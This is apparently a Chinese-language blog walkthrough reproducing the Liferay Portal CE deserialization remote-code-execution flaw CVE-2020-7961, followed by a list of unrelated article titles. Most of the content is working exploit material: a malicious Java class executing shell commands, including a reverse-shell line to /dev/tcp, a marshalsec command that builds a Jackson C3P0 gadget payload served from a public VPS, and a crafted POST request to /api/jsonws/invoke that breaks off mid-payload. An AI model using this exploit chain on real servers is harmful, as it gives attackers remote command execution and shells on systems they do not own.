Liferay Portal CE 反序列化命令执行漏洞(CVE-2020-7961)
影响范围
Liferay Portal 6.1.X
Liferay Portal 6.2.X
Liferay Portal 7.0.X
Liferay Portal 7.1.X
Liferay Portal 7.2.X
漏洞复现
准备一个恶意的Java类,编译
public class reverse {
static {
try {
String[] cmd = {"bash", "-c", "touch /tmp/success"};
java.lang.Runtime.getRuntime().
exec(cmd).waitFor();
} catch ( Exception e ) {
e.printStackTrace();
}
}
}
命令或者改为
"bash", "-c", "bash -i >& /dev/tcp/ip888 0>&1"
或者ping dns
String[] commands = {"ping", "xxx.dnslog.cn"};
同目录下公网vps开启
python -m SimpleHTTPServer
借助marshalsec来生成一个适用于Jackson的POC(这里借助fastion漏洞包里下载的工具)
cd marshalsec/
cd target/
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.Jackson C3P0WrapperConnPool http://ip:8000/ LifExp
#IP地址是公网的IP地址
生成的Payload是Jackson使用的,我们只需按照Liferay Portal的形式,即+参数名:类名=值,来修改这个Payload
访问http://192.168.49.2:8080/api/jsonws
修改以下数据包进行发送
POST /api/jsonws/invoke HTTP/1.1
Host: 192.168.49.28080
Content-Length: 1346
Content-Type: application/x-www-form-urlencoded
Connection: close
cmd=%7B%22%2Fexpandocolumn%2Fadd-column%22%3A%7B%7D%7D&p_auth=o3lt8q1F&formDate=1585270368703&tableId=1&name=2&type=3&%2BdefaultData:com.mchange.v2.c3p0.WrapperConnectionPoolDataSource={"userOverridesAsString":"H
最新文章
- ef 对象无法序列化的问题(System.Data.Entity.DynamicProxies)
- uboot 移植遇到的问题及解决方法(转)
- asp.net mvc让我告诉你请求从哪里来
- C#中Dictionary小记
- jsonString转NSDictionary
- 基于ASP.NET MVC和Bootstrap搭建响应式个人博客站(一)
- BUG: GetDC() ReleaseDC()引起的内存泄漏
- 《Java虚拟机原理图解》1.3、class文件里的訪问标志、类索引、父类索引、接口索引集合
- uva 10228 - Star not a Tree?(模拟退火)
- SSH深度历险(四) Maven初步学习
- go语言视频教程和电子书下载
- 1.XGBOOST算法推导
- 省选模拟赛第四轮 B——O(n^4)->O(n^3)->O(n^2)
- pyinstaller将python脚本生成exe
- 离线安装Cloudera Manager 5和CDH5(最新版5.9.3) 完全教程(一)环境说明
- out对象以及网上答题系统
- tp 生成静态页
- 20145328 《网络对抗技术》逆向及Bof基础实践
- C++在线编译器
- sass入门(一)